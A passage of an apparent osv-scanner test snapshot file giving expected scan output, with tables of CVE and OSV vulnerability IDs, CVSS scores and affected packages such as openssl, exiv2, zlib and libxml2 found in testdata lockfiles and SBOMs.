Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag - 1] Scanning dir ./testdata/call-analysis-go-project-all-uncalled Scanned /testdata/call-analysis-go-project-all-uncalled/go.mod file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | Uncalled vulnerabilities | | | | | | | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ | https://osv.dev/GO-2021-0053 | 8.6 | Go | github.com/gogo/protobuf | 1.3.1 | 1.3.2 | testdata/call-analysis-go-project-all-uncalled/go.mod | | https://osv.dev/GHSA-c3h9-896r-86jm | | | | | | | +-------------------------------------+------+-----------+--------------------------+---------+---------------+-------------------------------------------------------+ --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag - 2] --- [TestCommand_CommitSupport/offline_uses_git_tags - 1] Scanned /testdata/locks-git/osv-scanner.json file and found 11 packages Loaded GIT local db from /osv-scanner/GIT/all.zip Skipping commit scanning for: 45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0 Total 8 packages affected by 28 known vulnerabilities (5 Critical, 5 High, 11 Medium, 0 Low, 7 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------------+------+-----------+----------------------------+----------------------------+---------------+-------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+----------------------------+---------------+-------------------------------------+ | https://osv.dev/OSV-2018-389 | | GIT | git://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | http://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2023-1161 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2024-340 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | https://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-51757 | 9.3 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-61927 | 7.2 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-62410 | 9.4 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-11187 | 6.1 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15468 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | 
testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15469 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-4575 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-66199 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-2673 | | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2016-10931 | 8.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2018-20997 | 9.8 | GIT | 
https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | +--------------------------------+------+-----------+---------------------------------------------------------+---------------+-------------------------------------+ --- [TestCommand_CommitSupport/offline_uses_git_tags - 2] --- [TestCommand_CommitSupport/online_uses_git_commits - 1] Scanned /testdata/locks-git/osv-scanner.json file and found 11 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 11 packages affected by 56 known vulnerabilities (7 Critical, 12 High, 23 Medium, 7 Low, 7 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------------+------+-----------+----------------------------+-----------------------------+---------------+-------------------------------------+ | https://osv.dev/OSV-2018-389 | | GIT | git://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | http://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-44398 | 8.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/PYSEC-2023-233 | | | | | | | https://osv.dev/CVE-2024-24826 | 5.5 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | 
testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-25112 | 5.5 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-39695 | 5.3 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-26623 | 5.3 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-54080 | 1.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-55304 | 1.8 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-25884 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-27596 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-27631 | 2.7 | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2023-1161 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2024-340 | | GIT | https://github.com/Exiv2/exiv2@931a40a7 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2021-22569 | 5.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-1941 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3171 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3509 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2022-3510 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | 
https://osv.dev/CVE-2024-2410 | 9.8 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-7254 | 7.5 | GIT | https://github.com/apache/orc@17b30e96 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/OSV-2018-389 | | GIT | https://github.com/boostorg/boost@1a9dda41 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-51757 | 9.3 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-61927 | 7.2 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-62410 | 9.4 | GIT | https://github.com/capricorn86/happy-dom.git@f8221103 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-12797 | 6.3 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-13176 | 4.1 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2024-9143 | 4.3 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@45fda76b | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-11187 | 6.1 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15467 | 9.8 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15468 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 
| -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-15469 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-66199 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-68160 | 4.7 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69418 | 4.0 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69419 | 7.4 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-69420 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9230 | 7.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9231 | 6.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-9232 | 5.9 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22795 | 5.5 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-22796 | 5.3 | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2026-2673 | | GIT | https://github.com/openssl/openssl@aea7aaf2 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-6180 | 5.3 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-24898 | 
6.3 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-3416 | 3.7 | GIT | https://github.com/sfackler-fork/rust-openssl@3b064fdb | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2016-10931 | 8.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2018-20997 | 9.8 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-53159 | 9.1 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2023-6180 | 5.3 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | | https://osv.dev/CVE-2025-3416 | 3.7 | GIT | https://github.com/sfackler/rust-openssl@0f428d19 | -- | testdata/locks-git/osv-scanner.json | +--------------------------------+------+-----------+----------------------------------------------------------+---------------+-------------------------------------+ --- [TestCommand_CommitSupport/online_uses_git_commits - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file - 1] Scanning dir testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. 
CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) Filtered 2 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - GO-2022-0274 - CVE-2019-5188 - CVE-2022-1304 Total 1 package affected by 3 known vulnerabilities (1 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 - 1] Scanning dir testdata/sbom-insecure Scanned /testdata/sbom-insecure/alpine-zlib-16.cdx.json file and found 1 package Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/only-unimportant.spdx.json file and found 1 package Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Scanned 
/testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 10 local/unscannable package/s from the scan. CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) CVE-2022-1304 and 2 aliases have been filtered out because: (no reason given) GO-2022-0274 and 2 aliases have been filtered out because: (no reason given) CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) Filtered 8 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - CVE-2019-5188 Total 24 packages affected by 175 known vulnerabilities (21 Critical, 72 High, 55 Medium, 3 Low, 24 Unknown) from 4 ecosystems. 10 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc 
| v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | testdata/sbom-insecure/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 
| Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 